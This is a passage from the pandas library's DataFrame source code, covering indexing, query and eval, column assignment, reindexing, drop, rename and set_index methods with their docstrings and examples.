values = self._data.iget(i)
if index_len and not len(values):
values = np.array([np.nan] * index_len, dtype=object)
result = self._box_col_values(values, label)
# this is a cached value, mark it so
result._set_as_cached(label, self)
return result
def __getitem__(self, key):
key = com._apply_if_callable(key, self)
# shortcut if we are an actual column
is_mi_columns = isinstance(self.columns, MultiIndex)
try:
if key in self.columns and not is_mi_columns:
return self._getitem_column(key)
except:
pass
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
return self._getitem_slice(indexer)
if isinstance(key, (Series, np.ndarray, Index, list)):
# either boolean or fancy integer index
return self._getitem_array(key)
elif isinstance(key, DataFrame):
return self._getitem_frame(key)
elif is_mi_columns:
return self._getitem_multilevel(key)
else:
return self._getitem_column(key)
def _getitem_column(self, key):
""" return the actual column """
# get column
if self.columns.is_unique:
return self._get_item_cache(key)
# duplicate columns & possible reduce dimensionality
result = self._constructor(self._data.get(key))
if result.columns.is_unique:
result = result[key]
return result
def _getitem_slice(self, key):
return self._slice(key, axis=0)
def _getitem_array(self, key):
# also raises Exception if object array with NA values
if com.is_bool_indexer(key):
# warning here just in case -- previously __setitem__ was
# reindexing but __getitem__ was not; it seems more reasonable to
# go with the __setitem__ behavior since that is more consistent
# with all other indexing behavior
if isinstance(key, Series) and not key.index.equals(self.index):
warnings.warn("Boolean Series key will be reindexed to match "
"DataFrame index.", UserWarning, stacklevel=3)
elif len(key) != len(self.index):
raise ValueError('Item wrong length %d instead of %d.' %
(len(key), len(self.index)))
# check_bool_indexer will throw exception if Series key cannot
# be reindexed to match DataFrame rows
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
return self._take(indexer, axis=0, convert=False)
else:
indexer = self.loc._convert_to_indexer(key, axis=1)
return self._take(indexer, axis=1, convert=True)
def _getitem_multilevel(self, key):
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, Series, np.ndarray, Index)):
new_columns = self.columns[loc]
result_columns = maybe_droplevels(new_columns, key)
if self._is_mixed_type:
result = self.reindex(columns=new_columns)
result.columns = result_columns
else:
new_values = self.values[:, loc]
result = self._constructor(new_values, index=self.index,
columns=result_columns)
result = result.__finalize__(self)
# If there is only one column being returned, and its name is
# either an empty string, or a tuple with an empty string as its
# first element, then treat the empty string as a placeholder
# and return the column as if the user had provided that empty
# string in the key. If the result is a Series, exclude the
# implied empty string from its name.
if len(result.columns) == 1:
top = result.columns[0]
if isinstance(top, tuple):
top = top[0]
if top == '':
result = result['']
if isinstance(result, Series):
result = self._constructor_sliced(result,
index=self.index,
name=key)
result._set_is_copy(self)
return result
else:
return self._get_item_cache(key)
def _getitem_frame(self, key):
if key.values.size and not is_bool_dtype(key.values):
raise ValueError('Must pass DataFrame with boolean values only')
return self.where(key)
def query(self, expr, inplace=False, **kwargs):
"""Query the columns of a frame with a boolean expression.
Parameters
----------
expr : string
The query string to evaluate. You can refer to variables
in the environment by prefixing them with an '@' character like
``@a + b``.
inplace : bool
Whether the query should modify the data in place or return
a modified copy
.. versionadded:: 0.18.0
kwargs : dict
See the documentation for :func:`pandas.eval` for complete details
on the keyword arguments accepted by :meth:`DataFrame.query`.
Returns
-------
q : DataFrame
Notes
-----
The result of the evaluation of this expression is first passed to
:attr:`DataFrame.loc` and if that fails because of a
multidimensional key (e.g., a DataFrame) then the result will be passed
to :meth:`DataFrame.__getitem__`.
This method uses the top-level :func:`pandas.eval` function to
evaluate the passed query.
The :meth:`~pandas.DataFrame.query` method uses a slightly
modified Python syntax by default. For example, the ``&`` and ``|``
(bitwise) operators have the precedence of their boolean cousins,
:keyword:`and` and :keyword:`or`. This *is* syntactically valid Python,
however the semantics are different.
You can change the semantics of the expression by passing the keyword
argument ``parser='python'``. This enforces the same semantics as
evaluation in Python space. Likewise, you can pass ``engine='python'``
to evaluate an expression using Python itself as a backend. This is not
recommended as it is inefficient compared to using ``numexpr`` as the
engine.
The :attr:`DataFrame.index` and
:attr:`DataFrame.columns` attributes of the
:class:`~pandas.DataFrame` instance are placed in the query namespace
by default, which allows you to treat both the index and columns of the
frame as a column in the frame.
The identifier ``index`` is used for the frame index; you can also
use the name of the index to identify it in a query. Please note that
Python keywords may not be used as identifiers.
For further details and examples see the ``query`` documentation in
:ref:`indexing <indexing.query>`.
See Also
--------
pandas.eval
DataFrame.eval
Examples
--------
>>> from numpy.random import randn
>>> from pandas import DataFrame
>>> df = pd.DataFrame(randn(10, 2), columns=list('ab'))
>>> df.query('a > b')
>>> df[df.a > df.b] # same result as the previous expression
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if not isinstance(expr, compat.string_types):
msg = "expr must be a string to be evaluated, {0} given"
raise ValueError(msg.format(type(expr)))
kwargs['level'] = kwargs.pop('level', 0) + 1
kwargs['target'] = None
res = self.eval(expr, **kwargs)
try:
new_data = self.loc[res]
except ValueError:
# when res is multi-dimensional loc raises, but this is sometimes a
# valid query
new_data = self[res]
if inplace:
self._update_inplace(new_data)
else:
return new_data
def eval(self, expr, inplace=False, **kwargs):
"""
Evaluate a string describing operations on DataFrame columns.
Operates on columns only, not specific rows or elements. This allows
`eval` to run arbitrary code, which can make you vulnerable to code
injection if you pass user input to this function.
Parameters
----------
expr : str
The expression string to evaluate.
inplace : bool, default False
If the expression contains an assignment, whether to perform the
operation inplace and mutate the existing DataFrame. Otherwise,
a new DataFrame is returned.
.. versionadded:: 0.18.0.
kwargs : dict
See the documentation for :func:`~pandas.eval` for complete details
on the keyword arguments accepted by
:meth:`~pandas.DataFrame.query`.
Returns
-------
ndarray, scalar, or pandas object
The result of the evaluation.
See Also
--------
DataFrame.query : Evaluates a boolean expression to query the columns
of a frame.
DataFrame.assign : Can evaluate an expression or function to create new
values for a column.
pandas.eval : Evaluate a Python expression as a string using various
backends.
Notes
-----
For more details see the API documentation for :func:`~pandas.eval`.
For detailed examples see :ref:`enhancing performance with eval
<enhancingperf.eval>`.
Examples
--------
>>> df = pd.DataFrame({'A': range(1, 6), 'B': range(10, 0, -2)})
>>> df
A B
0 1 10
1 2 8
2 3 6
3 4 4
4 5 2
>>> df.eval('A + B')
0 11
1 10
2 9
3 8
4 7
dtype: int64
Assignment is allowed though by default the original DataFrame is not
modified.
>>> df.eval('C = A + B')
A B C
0 1 10 11
1 2 8 10
2 3 6 9
3 4 4 8
4 5 2 7
>>> df
A B
0 1 10
1 2 8
2 3 6
3 4 4
4 5 2
Use ``inplace=True`` to modify the original DataFrame.
>>> df.eval('C = A + B', inplace=True)
>>> df
A B C
0 1 10 11
1 2 8 10
2 3 6 9
3 4 4 8
4 5 2 7
"""
from pandas.core.computation.eval import eval as _eval
inplace = validate_bool_kwarg(inplace, 'inplace')
resolvers = kwargs.pop('resolvers', None)
kwargs['level'] = kwargs.pop('level', 0) + 1
if resolvers is None:
index_resolvers = self._get_index_resolvers()
resolvers = dict(self.iteritems()), index_resolvers
if 'target' not in kwargs:
kwargs['target'] = self
kwargs['resolvers'] = kwargs.get('resolvers', ()) + tuple(resolvers)
return _eval(expr, inplace=inplace, **kwargs)
def select_dtypes(self, include=None, exclude=None):
"""
Return a subset of the DataFrame's columns based on the column dtypes.
Parameters
----------
include, exclude : scalar or list-like
A selection of dtypes or strings to be included/excluded. At least
one of these parameters must be supplied.
Raises
------
ValueError
* If both of ``include`` and ``exclude`` are empty
* If ``include`` and ``exclude`` have overlapping elements
* If any kind of string dtype is passed in.
Returns
-------
subset : DataFrame
The subset of the frame including the dtypes in ``include`` and
excluding the dtypes in ``exclude``.
Notes
-----
* To select all *numeric* types, use ``np.number`` or ``'number'``
* To select strings you must use the ``object`` dtype, but note that
this will return *all* object dtype columns
* See the `numpy dtype hierarchy
<http://docs.scipy.org/doc/numpy/reference/arrays.scalars.html>`__
* To select datetimes, use ``np.datetime64``, ``'datetime'`` or
``'datetime64'``
* To select timedeltas, use ``np.timedelta64``, ``'timedelta'`` or
``'timedelta64'``
* To select Pandas categorical dtypes, use ``'category'``
* To select Pandas datetimetz dtypes, use ``'datetimetz'`` (new in
0.20.0) or ``'datetime64[ns, tz]'``
Examples
--------
>>> df = pd.DataFrame({'a': [1, 2] * 3,
... 'b': [True, False] * 3,
... 'c': [1.0, 2.0] * 3})
>>> df
a b c
0 1 True 1.0
1 2 False 2.0
2 1 True 1.0
3 2 False 2.0
4 1 True 1.0
5 2 False 2.0
>>> df.select_dtypes(include='bool')
b
0 True
1 False
2 True
3 False
4 True
5 False
>>> df.select_dtypes(include=['float64'])
c
0 1.0
1 2.0
2 1.0
3 2.0
4 1.0
5 2.0
>>> df.select_dtypes(exclude=['int'])
b c
0 True 1.0
1 False 2.0
2 True 1.0
3 False 2.0
4 True 1.0
5 False 2.0
"""
if not is_list_like(include):
include = (include,) if include is not None else ()
if not is_list_like(exclude):
exclude = (exclude,) if exclude is not None else ()
selection = tuple(map(frozenset, (include, exclude)))
if not any(selection):
raise ValueError('at least one of include or exclude must be '
'nonempty')
# convert the myriad valid dtypes object to a single representation
include, exclude = map(
lambda x: frozenset(map(_get_dtype_from_object, x)), selection)
for dtypes in (include, exclude):
invalidate_string_dtypes(dtypes)
# can't both include AND exclude!
if not include.isdisjoint(exclude):
raise ValueError('include and exclude overlap on %s' %
(include & exclude))
# empty include/exclude -> defaults to True
# three cases (we've already raised if both are empty)
# case 1: empty include, nonempty exclude
# we have True, True, ... True for include, same for exclude
# in the loop below we get the excluded
# and when we call '&' below we get only the excluded
# case 2: nonempty include, empty exclude
# same as case 1, but with include
# case 3: both nonempty
# the "union" of the logic of case 1 and case 2:
# we get the included and excluded, and return their logical and
include_these = Series(not bool(include), index=self.columns)
exclude_these = Series(not bool(exclude), index=self.columns)
def is_dtype_instance_mapper(column, dtype):
return column, functools.partial(issubclass, dtype.type)
for column, f in itertools.starmap(is_dtype_instance_mapper,
self.dtypes.iteritems()):
if include: # checks for the case of empty include or exclude
include_these[column] = any(map(f, include))
if exclude:
exclude_these[column] = not any(map(f, exclude))
dtype_indexer = include_these & exclude_these
return self.loc[com._get_info_slice(self, dtype_indexer)]
def _box_item_values(self, key, values):
items = self.columns[self.columns.get_loc(key)]
if values.ndim == 2:
return self._constructor(values.T, columns=items, index=self.index)
else:
return self._box_col_values(values, items)
def _box_col_values(self, values, items):
""" provide boxed values for a column """
klass = _get_sliced_frame_result_type(values, self)
return klass(values, index=self.index, name=items, fastpath=True)
def __setitem__(self, key, value):
key = com._apply_if_callable(key, self)
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
return self._setitem_slice(indexer, value)
if isinstance(key, DataFrame) or getattr(key, 'ndim', None) == 2:
self._setitem_frame(key, value)
elif isinstance(key, (Series, np.ndarray, list, Index)):
self._setitem_array(key, value)
else:
# set column
self._set_item(key, value)
def _setitem_slice(self, key, value):
self._check_setitem_copy()
self.loc._setitem_with_indexer(key, value)
def _setitem_array(self, key, value):
# also raises Exception if object array with NA values
if com.is_bool_indexer(key):
if len(key) != len(self.index):
raise ValueError('Item wrong length %d instead of %d!' %
(len(key), len(self.index)))
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
self._check_setitem_copy()
self.loc._setitem_with_indexer(indexer, value)
else:
if isinstance(value, DataFrame):
if len(value.columns) != len(key):
raise ValueError('Columns must be same length as key')
for k1, k2 in zip(key, value.columns):
self[k1] = value[k2]
else:
indexer = self.loc._convert_to_indexer(key, axis=1)
self._check_setitem_copy()
self.loc._setitem_with_indexer((slice(None), indexer), value)
def _setitem_frame(self, key, value):
# support boolean setting with DataFrame input, e.g.
# df[df > df2] = 0
if isinstance(key, np.ndarray):
if key.shape != self.shape:
raise ValueError(
'Array conditional must be same shape as self'
)
key = self._constructor(key, **self._construct_axes_dict())
if key.values.size and not is_bool_dtype(key.values):
raise TypeError(
'Must pass DataFrame or 2-d ndarray with boolean values only'
)
self._check_inplace_setting(value)
self._check_setitem_copy()
self._where(-key, value, inplace=True)
def _ensure_valid_index(self, value):
"""
ensure that if we don't have an index, that we can create one from the
passed value
"""
# GH5632, make sure that we are a Series convertible
if not len(self.index) and is_list_like(value):
try:
value = Series(value)
except:
raise ValueError('Cannot set a frame with no defined index '
'and a value that cannot be converted to a '
'Series')
self._data = self._data.reindex_axis(value.index.copy(), axis=1,
fill_value=np.nan)
def _set_item(self, key, value):
"""
Add series to DataFrame in specified column.
If series is a numpy-array (not a Series/TimeSeries), it must be the
same length as the DataFrames index or an error will be thrown.
Series/TimeSeries will be conformed to the DataFrames index to
ensure homogeneity.
"""
self._ensure_valid_index(value)
value = self._sanitize_column(key, value)
NDFrame._set_item(self, key, value)
# check if we are modifying a copy
# try to set first as we want an invalid
# value exception to occur first
if len(self):
self._check_setitem_copy()
def insert(self, loc, column, value, allow_duplicates=False):
"""
Insert column into DataFrame at specified location.
Raises a ValueError if `column` is already contained in the DataFrame,
unless `allow_duplicates` is set to True.
Parameters
----------
loc : int
Insertion index. Must verify 0 <= loc <= len(columns)
column : string, number, or hashable object
label of the inserted column
value : int, Series, or array-like
allow_duplicates : bool, optional
"""
self._ensure_valid_index(value)
value = self._sanitize_column(column, value, broadcast=False)
self._data.insert(loc, column, value,
allow_duplicates=allow_duplicates)
def assign(self, **kwargs):
r"""
Assign new columns to a DataFrame, returning a new object
(a copy) with all the original columns in addition to the new ones.
Parameters
----------
kwargs : keyword, value pairs
keywords are the column names. If the values are
callable, they are computed on the DataFrame and
assigned to the new columns. The callable must not
change input DataFrame (though pandas doesn't check it).
If the values are not callable, (e.g. a Series, scalar, or array),
they are simply assigned.
Returns
-------
df : DataFrame
A new DataFrame with the new columns in addition to
all the existing columns.
Notes
-----
Assigning multiple columns within the same ``assign`` is possible.
For Python 3.6 and above, later items in '\*\*kwargs' may refer to
newly created or modified columns in 'df'; items are computed and
assigned into 'df' in order. For Python 3.5 and below, the order of
keyword arguments is not specified, you cannot refer to newly created
or modified columns. All items are computed first, and then assigned
in alphabetical order.
.. versionchanged :: 0.23.0
Keyword argument order is maintained for Python 3.6 and later.
Examples
--------
>>> df = pd.DataFrame({'A': range(1, 11), 'B': np.random.randn(10)})
Where the value is a callable, evaluated on `df`:
>>> df.assign(ln_A = lambda x: np.log(x.A))
A B ln_A
0 1 0.426905 0.000000
1 2 -0.780949 0.693147
2 3 -0.418711 1.098612
3 4 -0.269708 1.386294
4 5 -0.274002 1.609438
5 6 -0.500792 1.791759
6 7 1.649697 1.945910
7 8 -1.495604 2.079442
8 9 0.549296 2.197225
9 10 -0.758542 2.302585
Where the value already exists and is inserted:
>>> newcol = np.log(df['A'])
>>> df.assign(ln_A=newcol)
A B ln_A
0 1 0.426905 0.000000
1 2 -0.780949 0.693147
2 3 -0.418711 1.098612
3 4 -0.269708 1.386294
4 5 -0.274002 1.609438
5 6 -0.500792 1.791759
6 7 1.649697 1.945910
7 8 -1.495604 2.079442
8 9 0.549296 2.197225
9 10 -0.758542 2.302585
Where the keyword arguments depend on each other
>>> df = pd.DataFrame({'A': [1, 2, 3]})
>>> df.assign(B=df.A, C=lambda x:x['A']+ x['B'])
A B C
0 1 1 2
1 2 2 4
2 3 3 6
"""
data = self.copy()
# >= 3.6 preserve order of kwargs
if PY36:
for k, v in kwargs.items():
data[k] = com._apply_if_callable(v, data)
else:
# <= 3.5: do all calculations first...
results = OrderedDict()
for k, v in kwargs.items():
results[k] = com._apply_if_callable(v, data)
# <= 3.5 and earlier
results = sorted(results.items())
# ... and then assign
for k, v in results:
data[k] = v
return data
def _sanitize_column(self, key, value, broadcast=True):
"""
Ensures new columns (which go into the BlockManager as new blocks) are
always copied and converted into an array.
Parameters
----------
key : object
value : scalar, Series, or array-like
broadcast : bool, default True
If ``key`` matches multiple duplicate column names in the
DataFrame, this parameter indicates whether ``value`` should be
tiled so that the returned array contains a (duplicated) column for
each occurrence of the key. If False, ``value`` will not be tiled.
Returns
-------
sanitized_column : numpy-array
"""
def reindexer(value):
# reindex if necessary
if value.index.equals(self.index) or not len(self.index):
value = value._values.copy()
else:
# GH 4107
try:
value = value.reindex(self.index)._values
except Exception as e:
# duplicate axis
if not value.index.is_unique:
raise e
# other
raise TypeError('incompatible index of inserted column '
'with frame index')
return value
if isinstance(value, Series):
value = reindexer(value)
elif isinstance(value, DataFrame):
# align right-hand-side columns if self.columns
# is multi-index and self[key] is a sub-frame
if isinstance(self.columns, MultiIndex) and key in self.columns:
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, Series, np.ndarray, Index)):
cols = maybe_droplevels(self.columns[loc], key)
if len(cols) and not cols.equals(value.columns):
value = value.reindex(cols, axis=1)
# now align rows
value = reindexer(value).T
elif isinstance(value, ExtensionArray):
value = value.copy()
elif isinstance(value, Index) or is_sequence(value):
from pandas.core.series import _sanitize_index
# turn me into an ndarray
value = _sanitize_index(value, self.index, copy=False)
if not isinstance(value, (np.ndarray, Index)):
if isinstance(value, list) and len(value) > 0:
value = maybe_convert_platform(value)
else:
value = com._asarray_tuplesafe(value)
elif value.ndim == 2:
value = value.copy().T
elif isinstance(value, Index):
value = value.copy(deep=True)
else:
value = value.copy()
# possibly infer to datetimelike
if is_object_dtype(value.dtype):
value = maybe_infer_to_datetimelike(value)
else:
# upcast the scalar
value = cast_scalar_to_array(len(self.index), value)
value = maybe_cast_to_datetime(value, value.dtype)
# return internal types directly
if is_extension_type(value) or is_extension_array_dtype(value):
return value
# broadcast across multiple columns if necessary
if broadcast and key in self.columns and value.ndim == 1:
if (not self.columns.is_unique or
isinstance(self.columns, MultiIndex)):
existing_piece = self[key]
if isinstance(existing_piece, DataFrame):
value = np.tile(value, (len(existing_piece.columns), 1))
return np.atleast_2d(np.asarray(value))
@property
def _series(self):
result = {}
for idx, item in enumerate(self.columns):
result[item] = Series(self._data.iget(idx), index=self.index,
name=item)
return result
def lookup(self, row_labels, col_labels):
"""Label-based "fancy indexing" function for DataFrame.
Given equal-length arrays of row and column labels, return an
array of the values corresponding to each (row, col) pair.
Parameters
----------
row_labels : sequence
The row labels to use for lookup
col_labels : sequence
The column labels to use for lookup
Notes
-----
Akin to::
result = []
for row, col in zip(row_labels, col_labels):
result.append(df.get_value(row, col))
Examples
--------
values : ndarray
The found values
"""
n = len(row_labels)
if n != len(col_labels):
raise ValueError('Row labels must have same size as column labels')
thresh = 1000
if not self._is_mixed_type or n > thresh:
values = self.values
ridx = self.index.get_indexer(row_labels)
cidx = self.columns.get_indexer(col_labels)
if (ridx == -1).any():
raise KeyError('One or more row labels was not found')
if (cidx == -1).any():
raise KeyError('One or more column labels was not found')
flat_index = ridx * len(self.columns) + cidx
result = values.flat[flat_index]
else:
result = np.empty(n, dtype='O')
for i, (r, c) in enumerate(zip(row_labels, col_labels)):
result[i] = self._get_value(r, c)
if is_object_dtype(result):
result = lib.maybe_convert_objects(result)
return result
# ----------------------------------------------------------------------
# Reindexing and alignment
def _reindex_axes(self, axes, level, limit, tolerance, method, fill_value,
copy):
frame = self
columns = axes['columns']
if columns is not None:
frame = frame._reindex_columns(columns, method, copy, level,
fill_value, limit, tolerance)
index = axes['index']
if index is not None:
frame = frame._reindex_index(index, method, copy, level,
fill_value, limit, tolerance)
return frame
def _reindex_index(self, new_index, method, copy, level, fill_value=np.nan,
limit=None, tolerance=None):
new_index, indexer = self.index.reindex(new_index, method=method,
level=level, limit=limit,
tolerance=tolerance)
return self._reindex_with_indexers({0: [new_index, indexer]},
copy=copy, fill_value=fill_value,
allow_dups=False)
def _reindex_columns(self, new_columns, method, copy, level,
fill_value=np.nan, limit=None, tolerance=None):
new_columns, indexer = self.columns.reindex(new_columns, method=method,
level=level, limit=limit,
tolerance=tolerance)
return self._reindex_with_indexers({1: [new_columns, indexer]},
copy=copy, fill_value=fill_value,
allow_dups=False)
def _reindex_multi(self, axes, copy, fill_value):
""" we are guaranteed non-Nones in the axes! """
new_index, row_indexer = self.index.reindex(axes['index'])
new_columns, col_indexer = self.columns.reindex(axes['columns'])
if row_indexer is not None and col_indexer is not None:
indexer = row_indexer, col_indexer
new_values = algorithms.take_2d_multi(self.values, indexer,
fill_value=fill_value)
return self._constructor(new_values, index=new_index,
columns=new_columns)
else:
return self._reindex_with_indexers({0: [new_index, row_indexer],
1: [new_columns, col_indexer]},
copy=copy,
fill_value=fill_value)
@Appender(_shared_docs['align'] % _shared_doc_kwargs)
def align(self, other, join='outer', axis=None, level=None, copy=True,
fill_value=None, method=None, limit=None, fill_axis=0,
broadcast_axis=None):
return super(DataFrame, self).align(other, join=join, axis=axis,
level=level, copy=copy,
fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis,
broadcast_axis=broadcast_axis)
@Appender(_shared_docs['reindex'] % _shared_doc_kwargs)
@rewrite_axis_style_signature('labels', [('method', None),
('copy', True),
('level', None),
('fill_value', np.nan),
('limit', None),
('tolerance', None)])
def reindex(self, *args, **kwargs):
axes = validate_axis_style_args(self, args, kwargs, 'labels',
'reindex')
kwargs.update(axes)
# Pop these, since the values are in `kwargs` under different names
kwargs.pop('axis', None)
kwargs.pop('labels', None)
return super(DataFrame, self).reindex(**kwargs)
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
return super(DataFrame,
self).reindex_axis(labels=labels, axis=axis,
method=method, level=level, copy=copy,
limit=limit, fill_value=fill_value)
def drop(self, labels=None, axis=0, index=None, columns=None,
level=None, inplace=False, errors='raise'):
"""
Drop specified labels from rows or columns.
Remove rows or columns by specifying label names and corresponding
axis, or by specifying directly index or column names. When using a
multi-index, labels on different levels can be removed by specifying
the level.
Parameters
----------
labels : single label or list-like
Index or column labels to drop.
axis : {0 or 'index', 1 or 'columns'}, default 0
Whether to drop labels from the index (0 or 'index') or
columns (1 or 'columns').
index, columns : single label or list-like
Alternative to specifying axis (``labels, axis=1``
is equivalent to ``columns=labels``).
.. versionadded:: 0.21.0
level : int or level name, optional
For MultiIndex, level from which the labels will be removed.
inplace : bool, default False
If True, do operation inplace and return None.
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and only existing labels are
dropped.
Returns
-------
dropped : pandas.DataFrame
See Also
--------
DataFrame.loc : Label-location based indexer for selection by label.
DataFrame.dropna : Return DataFrame with labels on given axis omitted
where (all or any) data are missing
DataFrame.drop_duplicates : Return DataFrame with duplicate rows
removed, optionally only considering certain columns
Series.drop : Return Series with specified index labels removed.
Raises
------
KeyError
If none of the labels are found in the selected axis
Examples
--------
>>> df = pd.DataFrame(np.arange(12).reshape(3,4),
... columns=['A', 'B', 'C', 'D'])
>>> df
A B C D
0 0 1 2 3
1 4 5 6 7
2 8 9 10 11
Drop columns
>>> df.drop(['B', 'C'], axis=1)
A D
0 0 3
1 4 7
2 8 11
>>> df.drop(columns=['B', 'C'])
A D
0 0 3
1 4 7
2 8 11
Drop a row by index
>>> df.drop([0, 1])
A B C D
2 8 9 10 11
Drop columns and/or rows of MultiIndex DataFrame
>>> midx = pd.MultiIndex(levels=[['lama', 'cow', 'falcon'],
... ['speed', 'weight', 'length']],
... labels=[[0, 0, 0, 1, 1, 1, 2, 2, 2],
... [0, 1, 2, 0, 1, 2, 0, 1, 2]])
>>> df = pd.DataFrame(index=midx, columns=['big', 'small'],
... data=[[45, 30], [200, 100], [1.5, 1], [30, 20],
... [250, 150], [1.5, 0.8], [320, 250],
... [1, 0.8], [0.3,0.2]])
>>> df
big small
lama speed 45.0 30.0
weight 200.0 100.0
length 1.5 1.0
cow speed 30.0 20.0
weight 250.0 150.0
length 1.5 0.8
falcon speed 320.0 250.0
weight 1.0 0.8
length 0.3 0.2
>>> df.drop(index='cow', columns='small')
big
lama speed 45.0
weight 200.0
length 1.5
falcon speed 320.0
weight 1.0
length 0.3
>>> df.drop(index='length', level=1)
big small
lama speed 45.0 30.0
weight 200.0 100.0
cow speed 30.0 20.0
weight 250.0 150.0
falcon speed 320.0 250.0
weight 1.0 0.8
"""
return super(DataFrame, self).drop(labels=labels, axis=axis,
index=index, columns=columns,
level=level, inplace=inplace,
errors=errors)
@rewrite_axis_style_signature('mapper', [('copy', True),
('inplace', False),
('level', None)])
def rename(self, *args, **kwargs):
"""Alter axes labels.
Function / dict values must be unique (1-to-1). Labels not contained in
a dict / Series will be left as-is. Extra labels listed don't throw an
error.
See the :ref:`user guide <basics.rename>` for more.
Parameters
----------
mapper, index, columns : dict-like or function, optional
dict-like or functions transformations to apply to
that axis' values. Use either ``mapper`` and ``axis`` to
specify the axis to target with ``mapper``, or ``index`` and
``columns``.
axis : int or str, optional
Axis to target with ``mapper``. Can be either the axis name
('index', 'columns') or number (0, 1). The default is 'index'.
copy : boolean, default True
Also copy underlying data
inplace : boolean, default False
Whether to return a new %(klass)s. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
Returns
-------
renamed : DataFrame
See Also
--------
pandas.DataFrame.rename_axis
Examples
--------
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(index=str, columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
>>> df.rename(index=str, columns={"A": "a", "C": "c"})
a B
0 1 4
1 2 5
2 3 6
Using axis-style parameters
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
"""
axes = validate_axis_style_args(self, args, kwargs, 'mapper', 'rename')
kwargs.update(axes)
# Pop these, since the values are in `kwargs` under different names
kwargs.pop('axis', None)
kwargs.pop('mapper', None)
return super(DataFrame, self).rename(**kwargs)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.fillna.__doc__)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None, **kwargs):
return super(DataFrame,
self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast, **kwargs)
@Appender(_shared_docs['replace'] % _shared_doc_kwargs)
def replace(self, to_replace=None, value=None, inplace=False, limit=None,
regex=False, method='pad', axis=None):
return super(DataFrame, self).replace(to_replace=to_replace,
value=value, inplace=inplace,
limit=limit, regex=regex,
method=method, axis=axis)
@Appender(_shared_docs['shift'] % _shared_doc_kwargs)
def shift(self, periods=1, freq=None, axis=0):
return super(DataFrame, self).shift(periods=periods, freq=freq,
axis=axis)
def set_index(self, keys, drop=True, append=False, inplace=False,
verify_integrity=False):
"""
Set the DataFrame index (row labels) using one or more existing
columns. By default yields a new object.
Parameters
----------
keys : column label or list of column labels / arrays
drop : boolean, default True
Delete columns to be used as the new index
append : boolean, default False
Whether to append columns to existing index
inplace : boolean, default False
Modify the DataFrame in place (do not create a new object)
verify_integrity : boolean, default False
Check the new index for duplicates. Otherwise defer the check until
necessary. Setting to False will improve the performance of this
method
Examples
--------
>>> df = pd.DataFrame({'month': [1, 4, 7, 10],
... 'year': [2012, 2014, 2013, 2014],
... 'sale':[55, 40, 84, 31]})
month sale year
0 1 55 2012
1 4 40 2014
2 7 84 2013
3 10 31 2014
Set the index to become the 'month' column:
>>> df.set_index('month')
sale year
month
1 55 2012
4 40 2014
7 84 2013
10 31 2014
Create a multi-index using columns 'year' and 'month':
>>> df.set_index(['year', 'month'])
sale
year month
2012 1 55
2014 4 40
2013 7 84
2014 10 31
Create a multi-index using a set of values and a column:
>>> df.set_index([[1, 2, 3, 4], 'year'])
month sale
year
1 2012 1 55
2 2014 4 40
3 2013 7 84
4 2014 10 31
Returns
-------
dataframe : DataFrame
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if not isinstance(keys, list):
keys = [keys]
if inplace:
frame = self
else:
frame = self.copy()
arrays = []
names = []
if append:
names = [x for x in self.index.names]
if isinstance(self.index, MultiIndex):
for i in range(self.index.nlevels):
arrays.append(self.index._get_level_values(i))
else:
arrays.append(self.index)
to_remove = []
for col in keys:
if isinstance(col, MultiIndex):
# append all but the last column so we don't have to modify
# the end of this loop
for n in range(col.nlevels - 1):
arrays.append(col._get_level_values(n))
level = col._get_level_values(col.nlevels - 1)
names.extend(col.names)
elif isinstance(col, Series):
level = col._values
names.append(col.name)
elif isinstance(col, Index):
level = col
names.append(col.name)
elif isinstance(col, (list, np.ndarray, Index)):
level = col
names.append(None)
else:
level = frame[col]._values
names.append(col)
if drop:
to_remove.append(col)
arrays.append(level)
index = _ensure_index_from_sequences(arrays, names)
if verify_integrity and not index.is_unique:
duplicates = index.get_duplicates()
raise ValueError('Index has duplicate keys: %s' % duplicates)
for c in to_remove:
del frame[c]
# clear up memory usage
index._cleanup()
frame.index = index
if not inplace:
return frame
def reset_index(self, level=None, drop=False, inplace=False, col_level=0,
col_fill=''):
"""
For DataFrame with multi-level index, return new DataFrame with
labeling information in the columns under the index names, defaulting
to 'level_0', 'level_1', etc. if any are None. For a standard index,
the index name will be used (if set), otherwise a default 'index' or
'level_0' (if 'index' is already taken) will be used.
Parameters
----------
level : int, str, tuple, or list, default None
Only remove the given levels from the index. Removes all levels by
default
drop : boolean, default False
Do not try to insert index into dataframe columns. This resets
the index to the default integer index.
inplace : boolean, default False
Modify the DataFrame in place (do not create a new object)
col_level : int or str, default 0
If the columns have multiple levels, determines which level the
labels are inserted into. By default it is inserted into the first
level.
col_fill : object, default ''
If the columns have multiple levels, determines how the other
levels are named. If None then the index name is repeated.
Returns
-------
resetted : DataFrame
Examples
--------
>>> df = pd.DataFrame([('bird', 389.0),
... ('bird', 24.0),
... ('mammal', 80.5),
... ('mammal', np.nan)],
... index=['falcon', 'parrot', 'lion', 'monkey'],
... columns=('class', 'max_speed'))
>>> df
class max_speed
falcon bird 389.0
parrot bird 24.0
